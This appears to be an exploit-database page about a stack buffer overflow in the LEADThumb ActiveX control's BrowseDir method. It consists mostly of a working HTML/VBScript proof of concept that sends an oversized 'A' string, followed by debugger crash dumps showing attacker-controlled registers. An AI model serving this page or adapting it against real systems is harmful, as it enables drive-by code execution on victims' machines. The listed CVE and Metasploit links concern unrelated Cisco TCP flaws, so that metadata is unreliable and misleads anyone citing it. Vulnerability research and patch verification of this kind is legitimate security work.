Test Exploit Page

vendor:

Common Controls for Rational Applications

by:

Unknown

9,3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Common Controls for Rational Applications

Affected Version From: LEADThumbLib.LEADThumb ActiveX control (lttmb11n.ocx) version 11.0.0.0

Affected Version To: LEADThumbLib.LEADThumb ActiveX control (lttmb11n.ocx) version 11.0.0.0

Patch Exists: Yes

Related CWE: CVE-2008-4609

CPE: a:rational_software:common_controls_for_rational_applications:11.0.0.0

Metasploit: https://www.rapid7.com/db/vulnerabilities/cisco-nx-os-cisco-sa-20090908-tcp24/, https://www.rapid7.com/db/vulnerabilities/cisco-sa-20090908-tcp24/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

This exploit is a buffer overflow vulnerability in LEADThumbLib.LEADThumb ActiveX control (lttmb11n.ocx) which allows an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused due to a boundary error when handling the 'BrowseDir' method. By passing a specially crafted argument to the 'BrowseDir' method, an attacker can cause a stack-based buffer overflow, resulting in the execution of arbitrary code.

Mitigation:

Upgrade to the latest version of LEADThumbLib.LEADThumb ActiveX control (lttmb11n.ocx)

Source

Exploit-DB raw data:

<html>
Test Exploit Page
<object classid='clsid:00110200-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\lttmb11n.ocx"
prototype  = "Function BrowseDir ( ByVal pszDirectory As String ) As Integer"
memberName = "BrowseDir"
progid     = "LEADThumbLib.LEADThumb"
argCount   = 1

arg1=String(4116, "A")

target.BrowseDir arg1 

</script>


Exception Code: ACCESS_VIOLATION
Disasm: 7C80BE74	MOV CL,[EAX]

Seh Chain:
--------------------------------------------------
1 	7C839AD8 	KERNEL32.dll
2 	73352960 	VBSCRIPT.dll
3 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
KERNEL32.7C80BE74             LTTMB11n.AC1153               
LTTMB11n.AC1153               OLEAUT32.77135CD9             
OLEAUT32.77135CD9             OLEAUT32.771362E8             
OLEAUT32.771362E8             lttmb11n.AA6E11               
lttmb11n.AA6E11               lttmb11n.AA27C9               
lttmb11n.AA27C9               VBSCRIPT.73303EB7             
VBSCRIPT.73303EB7             VBSCRIPT.73303E27             
VBSCRIPT.73303E27             VBSCRIPT.73303397             
VBSCRIPT.73303397             VBSCRIPT.73303D88             
VBSCRIPT.73303D88             VBSCRIPT.7330409F             
VBSCRIPT.7330409F             VBSCRIPT.733063EE             
VBSCRIPT.733063EE             VBSCRIPT.73306373             
VBSCRIPT.73306373             VBSCRIPT.73306BA5             
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D             
VBSCRIPT.73306D9D             VBSCRIPT.73305103             
VBSCRIPT.73305103             SCROBJ.5CE44396               
SCROBJ.5CE44396               SCROBJ.5CE4480B               
SCROBJ.5CE4480B               SCROBJ.5CE446A6               
SCROBJ.5CE446A6               SCROBJ.5CE44643               
SCROBJ.5CE44643               SCROBJ.5CE44608               
SCROBJ.5CE44608               1013C93                       
1013C93                       1006B0C                       
1006B0C                       100332C                       
100332C                       1003105                       
1003105                       1003076                       
1003076                       1002F16                       
1002F16                       KERNEL32.7C817077             


Registers:
--------------------------------------------------
EIP 7C80BE74
EAX 41414141
EBX 00000000
ECX 41414141
EDX 41414142
EDI 00AA46E9 -> 8BEC8B55
ESI FFFFFFF6
EBP 0013C560 -> 0013EDAC
ESP 0013C53C -> 00AA46E9


Block Disassembly: 
--------------------------------------------------
7C80BE5D	CALL 7C8024D6
7C80BE62	MOV EAX,[EBP+8]
7C80BE65	TEST EAX,EAX
7C80BE67	JE 7C836665
7C80BE6D	AND DWORD PTR [EBP-4],0
7C80BE71	LEA EDX,[EAX+1]
7C80BE74	MOV CL,[EAX]	  <--- CRASH
7C80BE76	INC EAX
7C80BE77	TEST CL,CL
7C80BE79	JNZ SHORT 7C80BE74
7C80BE7B	SUB EAX,EDX
7C80BE7D	OR DWORD PTR [EBP-4],FFFFFFFF
7C80BE81	CALL 7C802511
7C80BE86	RETN 4
7C80BE89	NOP


ArgDump:
--------------------------------------------------
EBP+8	41414141
EBP+12	0013EDAC -> 0013EDCC
EBP+16	00000008
EBP+20	02231F58 -> 00AAA628
EBP+24	0013CD70 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28	00000000


Stack Dump:
--------------------------------------------------
13C53C E9 46 AA 00 F6 FF FF FF 00 00 00 00 3C C5 13 00  [.F..............]
13C54C AC F1 13 00 AC F1 13 00 D8 9A 83 7C 90 BE 80 7C  [................]
13C55C 00 00 00 00 AC ED 13 00 53 11 AC 00 41 41 41 41  [........S.......]
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00  [........X...p...]
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00  [................]



Exception Code: ACCESS_VIOLATION
Disasm: AC115A	CMP BYTE PTR [ECX+EAX-1],5C

Seh Chain:
--------------------------------------------------
1 	73352960 	VBSCRIPT.dll
2 	7C839AD8 	KERNEL32.dll


Called From                   Returns To                    
--------------------------------------------------
LTTMB11n.AC115A               OLEAUT32.77135CD9             
OLEAUT32.77135CD9             OLEAUT32.771362E8             
OLEAUT32.771362E8             lttmb11n.AA6E11               
lttmb11n.AA6E11               lttmb11n.AA27C9               
lttmb11n.AA27C9               VBSCRIPT.73303EB7             
VBSCRIPT.73303EB7             VBSCRIPT.73303E27             
VBSCRIPT.73303E27             VBSCRIPT.73303397             
VBSCRIPT.73303397             VBSCRIPT.73303D88             
VBSCRIPT.73303D88             VBSCRIPT.7330409F             
VBSCRIPT.7330409F             VBSCRIPT.733063EE             
VBSCRIPT.733063EE             VBSCRIPT.73306373             
VBSCRIPT.73306373             VBSCRIPT.73306BA5             
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D             
VBSCRIPT.73306D9D             VBSCRIPT.73305103             
VBSCRIPT.73305103             SCROBJ.5CE44396               
SCROBJ.5CE44396               SCROBJ.5CE4480B               
SCROBJ.5CE4480B               SCROBJ.5CE446A6               
SCROBJ.5CE446A6               SCROBJ.5CE44643               
SCROBJ.5CE44643               SCROBJ.5CE44608               
SCROBJ.5CE44608               1013C93                       
1013C93                       1006B0C                       
1006B0C                       100332C                       
100332C                       1003105                       
1003105                       1003076                       
1003076                       1002F16                       
1002F16                       KERNEL32.7C817077             


Registers:
--------------------------------------------------
EIP 00AC115A
EAX 00000000
EBX 00000000
ECX 41414141
EDX 00000000
EDI 00AA46E9 -> 8BEC8B55
ESI FFFFFFF6
EBP 0013EDAC -> 0013EDCC
ESP 0013C56C -> 0013EDAC


Block Disassembly: 
--------------------------------------------------
AC113E	PUSH EAX
AC113F	CALL [ACE1B0]
AC1145	MOV ECX,[ESP+7B4]
AC114C	PUSH ECX
AC114D	CALL [ACE1AC]
AC1153	MOV ECX,[ESP+7B4]
AC115A	CMP BYTE PTR [ECX+EAX-1],5C	  <--- CRASH
AC115F	JE SHORT 00AC1171
AC1161	LEA EAX,[ESP+68]
AC1165	PUSH ACA03C
AC116A	PUSH EAX
AC116B	CALL [ACE1A8]
AC1171	MOV EAX,[ESP+7B8]
AC1178	LEA ECX,[ESP+68]
AC117C	PUSH EAX


ArgDump:
--------------------------------------------------
EBP+8	02231F58 -> 00AAA628
EBP+12	00184934 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16	0013EE10 -> 00000000
EBP+20	0013EE00 -> 00130000
EBP+24	02281A50 -> 00000038
EBP+28	0013EDC0 -> 0013EE00


Stack Dump:
--------------------------------------------------
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00  [........X...p...]
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00  [................]
13C58C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13C59C 1C 00 00 00 96 00 00 00 96 00 00 00 00 02 00 00  [................]
13C5AC 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  [................]



ApiLog
--------------------------------------------------

***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)